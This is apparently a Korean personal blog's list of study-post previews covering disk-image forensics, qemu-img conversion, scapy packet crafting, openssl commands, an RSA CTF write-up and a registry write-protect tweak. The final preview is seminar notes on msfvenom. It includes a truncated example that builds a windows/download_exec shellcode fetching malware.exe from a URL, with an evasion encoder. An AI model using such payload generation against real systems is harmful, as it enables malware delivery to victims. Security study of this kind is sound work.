목록공부 (19)
참교육
Win32 Disk Imager 를 활용하여 부팅 디스크를 제작하였으나 실제 컴퓨터에 부팅작업을 진행했을 시 오류를 출력하였다. 분석 PC 가 가상머신 이미지임을 가정하고 테스트를 진행하였다. ① qemu 모듈 설치 ‘sudo apt-get install qemu' ② qemu-img convert -pO vmdk /dd 경로 /vmdk 경로 (dd 이미지로부터 vmdk 파일로의 변환) ※ -p: 필수 옵션은 아니지만 변환이 완료되었을 때 가독성이 좋게 출력된다. ※ -O: Output 명시 옵션으로 현재 명령어에서는 출력 형식이 vmdk 로 지정되어 있다. ③ 변환이 완료되면 vmware 에서 vmdk 에 맞는 운영체제를 iso 파일 없이 설치한다. ※ 이번 분석의 경우 Windows 7 ※ 'I wi..
RAW IMAGE to VMDK
① qemu모듈 설치 ‘sudo apt-get install qemu' ② qemu-img convert -pO vmdk /dd경로 /vmdk경로 ※ -p: 필수 옵션은 아니지만 변환이 완료되었을 때 가독성이 좋게 출력된다. ※ -O: Output 명시 옵션으로 현재 명령어에서는 출력 형식이 vmdk로 지정되어 있다. ③ 변환이 완료되면 vmware에서 vmdk에 맞는 운영체제를 iso파일 없이 설치한다. ※ 이번 분석의 경우 Windows 7 ※ 'I will install the operation system later'을 선택한다. ④ vmdk만 해당 가상머신 폴더에 넣어준 후 부팅하면 된다. vmx를 추출한 vmdk로 연결하여 실행한다.
raw 소켓 공부하다가 알아낸 파이썬 모듈이다. ethernet, ip, tcp header들 모두 조작 가능하다. from scapy.all import * syn = IP(dst='127.0.0.1') / TCP(dport=80, flags='S')syn_ack = sr1(syn)getStr = 'POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 0\r\nAccept: */*\r\nOrigin:\r\n127.0.0.1\r\nX-Requested-With: XMLHttpRequest\r\nAccept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\r\nConnection: close\r\n\r\n'request = IP(..
openssl Prime Generateopenssl prime -generate -bits 512 -hex openssl Privatekey to Publickeyopenssl rsa -in private.pem -pubout > public.pem openssl Certificate to Publickey openssl x509 -inform der -pubkey -noout -in openssl Certificate to Cert(String) openssl x509 -inform DER -in cert.der -text openssl RSA Encrypt openssl rsautl -encrypt -inkey publickey.pem -pubin -in key.bin -out key.bin.enc..
이번 코게에서 RSAbaby문제가 나와서 풀어봤는데 수식이 정리가 안돼서 못풀었다. 이건 라이트업 보면서 내가 이해한대로 정리한 것.. 문제 파일은 총 2갠데 하나는 파이썬, 하나는 텍스트 파일이다. [*] Encrypted Data : 3808385258062553378939467430503271739474333715862478147590504305782043000946352708779536901297622027698759969392761978421472248572203726797036194978069273983997951089529624428919051464402029080750350709790974128543586366213485312777132252980876141672767696315145656..
python3에서 yaml을 설치하려면 "pip install pyyaml"로 설치해야 한다.근데 이상하게도 중간에 ''''''Collecting PyYAML Using cached PyYAML-3.12.tar.gzBuilding wheels for collected packages: PyYAML Running setup.py bdist_wheel for PyYAML ... error Failed building wheel for PyYAML Running setup.py clean for PyYAMLFailed to build PyYAMLInstalling collected packages: PyYAML Running setup.py install for PyYAML ... errorException:..
dd if=/dev/sda | gzip -1 - | pv | ssh user@local dd of=image.gzdd if=/dev/sda (fdisk -l 로 디스크 이름 확인) : 현재 디스크 내용 출력gzip -1 : 빠른 압축 (뒤에 나오는 - 는 무슨의민지는 잘 모르겠다. 없어도 잘 됨)pv : 명령어의 실행 시간을 출력(진행사항을 대략 알 수 있음)ssh user@local -p port dd of=image.gz : ssh에 접속하여 image.gz파일로 전송
1. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies 로 들어가기 (없으면 키 값 만들어주기) 2. WriteProtect라는 DWORD 값 생성. 3. 해당 값이 1이면 쓰기 방지, 0이면 쓰기 방지 해제
이번 세미나때 들은걸로 자세한 설명은 추후에 .. msfvenom --help- 쉘코드 만드는 명령어 msfvenon -l payloads-만들 수 있는 공격코드 목록 msfvenon -l encoders- 사용하는 CPU(alpha_upper, shikata_ga_nai를 많이 사용) msfvenon --help-formats- 쉘코드 작성 언어 msfvenom -p windows/download_exec --payload-options- --pyadloa-options : 앞에 나온 공격 코드의 사용할 수 있는 옵션 목록 간단한 쉘코드 만들기 예제msfvenom -p windows/download_exec EXE=malware.exe URL=http://dev.fngs.kr/malware.exe -e..